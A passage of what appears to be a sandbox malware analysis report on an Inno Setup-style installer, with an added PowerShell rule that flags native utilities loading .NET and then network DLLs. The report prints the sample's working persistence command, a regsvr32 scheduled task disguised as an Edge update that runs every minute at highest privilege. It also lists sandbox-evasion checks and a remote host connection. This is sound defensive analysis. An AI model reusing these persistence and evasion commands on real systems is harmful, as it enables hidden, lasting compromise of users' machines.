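# Added detection example, not part of the Joe Sandbox report or the sample.
# Rule: a native Windows utility that carries no managed code of its own loads
# the .NET runtime, and afterwards loads network DLLs in the same process.
# Input records are shaped like Sysmon Event ID 7 (ImageLoad).
# The three watch lists are this example's own hunting choices.

$NativeHosts = @('regsvr32.exe', 'rundll32.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe')
$ClrModules  = @('mscoree.dll', 'clr.dll', 'coreclr.dll', 'clrjit.dll')
$NetModules  = @('winhttp.dll', 'wininet.dll', 'ws2_32.dll', 'webio.dll', 'dnsapi.dll', 'schannel.dll')

function Find-UnexpectedClrHost {
    param(
        # Objects carrying UtcTime, ProcessId, Image and ImageLoaded.
        [Parameter(Mandatory)] [object[]]$Events
    )
    $clrSeen = @{}   # ProcessId -> first CLR module observed in that process
    foreach ($e in ($Events | Sort-Object UtcTime)) {
        $proc = ($e.Image -replace '^.*[\\/]', '').ToLowerInvariant()
        $dll  = ($e.ImageLoaded -replace '^.*[\\/]', '').ToLowerInvariant()
        if ($NativeHosts -notcontains $proc) { continue }

        if ($ClrModules -contains $dll) {
            if (-not $clrSeen.ContainsKey($e.ProcessId)) { $clrSeen[$e.ProcessId] = $dll }
            [pscustomobject]@{
                UtcTime   = $e.UtcTime
                ProcessId = $e.ProcessId
                Image     = $proc
                Loaded    = $dll
                Finding   = 'native utility started the .NET runtime'
            }
        }
        elseif ($clrSeen.ContainsKey($e.ProcessId) -and $NetModules -contains $dll) {
            [pscustomobject]@{
                UtcTime   = $e.UtcTime
                ProcessId = $e.ProcessId
                Image     = $proc
                Loaded    = $dll
                Finding   = "network DLL after $($clrSeen[$e.ProcessId]) in the same process"
            }
        }
    }
}

# Constructed records mirroring the regsvr32 and powershell rows in this report;
# they are not real telemetry.
$sample = @(
    [pscustomobject]@{ UtcTime = '2025-01-01 10:00:00'; ProcessId = 4120; Image = 'C:\Windows\System32\regsvr32.exe'; ImageLoaded = 'C:\Windows\System32\apphelp.dll' }
    [pscustomobject]@{ UtcTime = '2025-01-01 10:00:01'; ProcessId = 4120; Image = 'C:\Windows\System32\regsvr32.exe'; ImageLoaded = 'C:\Windows\System32\mscoree.dll' }
    [pscustomobject]@{ UtcTime = '2025-01-01 10:00:02'; ProcessId = 4120; Image = 'C:\Windows\System32\regsvr32.exe'; ImageLoaded = 'C:\Windows\System32\amsi.dll' }
    [pscustomobject]@{ UtcTime = '2025-01-01 10:00:03'; ProcessId = 4120; Image = 'C:\Windows\System32\regsvr32.exe'; ImageLoaded = 'C:\Windows\System32\schannel.dll' }
    [pscustomobject]@{ UtcTime = '2025-01-01 10:00:04'; ProcessId = 4120; Image = 'C:\Windows\System32\regsvr32.exe'; ImageLoaded = 'C:\Windows\System32\winhttp.dll' }
    # powershell.exe is a managed host, so its CLR load is expected and not reported.
    [pscustomobject]@{ UtcTime = '2025-01-01 10:00:05'; ProcessId = 5200; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ImageLoaded = 'C:\Windows\System32\mscoree.dll' }
)

Find-UnexpectedClrHost -Events $sample | Format-Table -AutoSize

# Live use with Sysmon installed: map Event ID 7 EventData onto the same four fields.
# $live = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 7 } |
#     ForEach-Object {
#         $d = @{}; ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
#         [pscustomobject]@{ UtcTime = $d.UtcTime; ProcessId = [int]$d.ProcessId; Image = $d.Image; ImageLoaded = $d.ImageLoaded }
#     }
# Find-UnexpectedClrHost -Events $live
```

      The rule is a triage filter, not a verdict: rundll32.exe in particular will occasionally host managed shell extensions on a developer box, so tune $NativeHosts to the fleet. The useful property is the ordering, which the CLR-then-network pairing captures and a single "regsvr32 loaded mscoree.dll" match does not: it ties the managed payload to the process that later talks to the network, which is what the report's own signatures ("System process connects to network", "Suricata IDS alerts") describe from the other side.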
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Window found: window name: TMainForm
      Source: Window Recorder   Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: 8n26gvrXUM.exe   Static file information: File size 1479422 > 1048576
      Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: 8n26gvrXUM.tmp, 00000001.00000002.928756353.0000000002393000.00000002.00000001.01000000.00000006.sdmp, 8n26gvrXUM.tmp, 00000001.00000003.884415031.0000000003370000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.00000000036C8000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.7.dr

      Data Obfuscation

      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
      Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_00007FFD348E7F00 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateEventW,WaitForSingleObject, 9_2_00007FFD348E7F00
      Source: _isdecmp.dll.1.dr | Static PE information: real checksum: 0x0 should be: 0x5528
      Source: _isdecmp.dll.7.dr | Static PE information: real checksum: 0x0 should be: 0x5528
      Source: _setup64.tmp.1.dr | Static PE information: real checksum: 0x0 should be: 0x8546
      Source: 8n26gvrXUM.exe | Static PE information: real checksum: 0x0 should be: 0x171e8d
      Source: is-JVPOA.tmp.7.dr | Static PE information: real checksum: 0x0 should be: 0x131baa
      Source: is-J08NI.tmp.7.dr | Static PE information: real checksum: 0x55cb should be: 0x1af86a
      Source: 8n26gvrXUM.tmp.6.dr | Static PE information: real checksum: 0x0 should be: 0x122532
      Source: _setup64.tmp.7.dr | Static PE information: real checksum: 0x0 should be: 0x8546
      Source: 8n26gvrXUM.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x122532
      Source: is-J08NI.tmp.7.dr | Static PE information: section name: .xdata
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFCF436D2A5 pushad ; iretd 10_2_00007FFCF436D2A6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFCF435D2A5 pushad ; iretd 12_2_00007FFCF435D2A6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFCF447751C push ebx; iretd 12_2_00007FFCF447754A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFCF4470525 pushad ; retf 12_2_00007FFCF44705ED
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFCF44705EE pushad ; retf 12_2_00007FFCF44705ED
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFCF4542566 push 8B485F93h; iretd 12_2_00007FFCF454256B
      Source: C:\Windows\System32\regsvr32.exe | Code function: 14_2_02F91E2C push ds; iretd 14_2_02F91E32
      Source: C:\Windows\System32\regsvr32.exe | Code function: 14_2_02F91DCA push ds; iretd 14_2_02F91E32
      Source: C:\Windows\System32\regsvr32.exe | Code function: 14_2_00007FFCF449C194 push eax; ret 14_2_00007FFCF449C1AC
      Source: C:\Windows\System32\regsvr32.exe | Code function: 14_2_00007FFCF4493E15 push ebx; retn 000Dh 14_2_00007FFCF4493E2A
      Source: C:\Windows\System32\regsvr32.exe | Code function: 14_2_00007FFCF46652C4 push esp; iretd 14_2_00007FFCF46655B9
      Source: C:\Users\user\Desktop\8n26gvrXUM.exe | File created: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | File created: C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_setup64.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | File created: C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | File created: C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_shfoldr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | File created: C:\Users\user\AppData\Local\is-JVPOA.tmp
      Source: C:\Users\user\Desktop\8n26gvrXUM.exe | File created: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | File created: C:\Users\user\AppData\Roaming\netapi32_1.drv (copy)
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp | File created: C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_isdecmp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | File created: C:\Users\user\AppData\Roaming\is-J08NI.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp | File created: C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_setup64.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | File created: C:\Users\user\AppData\Local\unins000.exe (copy)
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp | File created: C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_shfoldr.dll

      Boot Survival

      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Users\user\Desktop\8n26gvrXUM.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX (50 identical entries in the report)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (110 identical entries in the report)

      Malware Analysis System Evasion

      Source: C:\Windows\System32\regsvr32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\System32\regsvr32.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
      Source: C:\Windows\System32\regsvr32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
      Source: C:\Windows\System32\regsvr32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: regsvr32.exe, 00000009.00000002.1165478568.00000000004CB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IDAG.EXE
      Source: regsvr32.exe, 00000009.00000002.1165478568.00000000004CB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IDAQ.EXE
      Source: C:\Windows\System32\regsvr32.exe | Memory allocated: 2F50000 memory reserve | memory write watch
      Source: C:\Windows\System32\regsvr32.exe | Memory allocated: 1B3B0000 memory reserve | memory write watch
      Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_00007FFD348EB900 CreateToolhelp32Snapshot,memset,Process32FirstW,memcpy,memcpy,CloseHandle,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess, 9_2_00007FFD348EB900
      Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9914
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9843
      Source: C:\Windows\System32\regsvr32.exe | Window / User API: threadDelayed 9864
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9907
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_setup64.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_shfoldr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-JVPOA.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\netapi32_1.drv (copy)
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_isdecmp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-J08NI.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_setup64.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_shfoldr.dll
      Source: C:\Windows\System32\regsvr32.exe | API coverage: 8.9 %
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408 | Thread sleep count: 9914 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096 | Thread sleep count: 9843 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096 | Thread sleep count: 79 > 30
      Source: C:\Windows\System32\regsvr32.exe TID: 7184 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\regsvr32.exe TID: 6092 | Thread sleep time: -2767011611056431s >= -30000s
      Source: C:\Windows\System32\regsvr32.exe TID: 3308 | Thread sleep count: 9864 > 30
      Source: C:\Windows\System32\regsvr32.exe TID: 3308 | Thread sleep count: 90 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9052 | Thread sleep count: 9907 > 30
      Source: C:\Windows\System32\svchost.exe TID: 1816 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070409
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04090409
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08090809
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070409
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04090409
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08090809
      Source: C:\Windows\System32\regsvr32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 922337203685477
      Source: powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000000F.00000002.1110863403.0000020890077000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
      Source: powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: regsvr32.exe, 0000000E.00000002.2141520016.000000001BB1E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1337298910.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2142655028.000000001C0EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2136362974.000001C711C2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139259075.000001C71388E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | Process information queried: ProcessInformation
      Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_00007FFD348EB900 CreateToolhelp32Snapshot,memset,Process32FirstW,memcpy,memcpy,CloseHandle,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess, 9_2_00007FFD348EB900
      Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_00007FFD348E7F00 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateEventW,WaitForSingleObject, 9_2_00007FFD348E7F00
      Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_00007FFD34947EC0 GetProcessHeap, 9_2_00007FFD34947EC0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Windows\System32\regsvr32.exe | Process token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Windows\System32\regsvr32.exe | Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\System32\regsvr32.exe | Network Connect: 144.202.34.112 56001
      Source: C:\Windows\System32\regsvr32.exe | Thread register set: 8808 5
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 3
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Desktop\8n26gvrXUM.exe "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
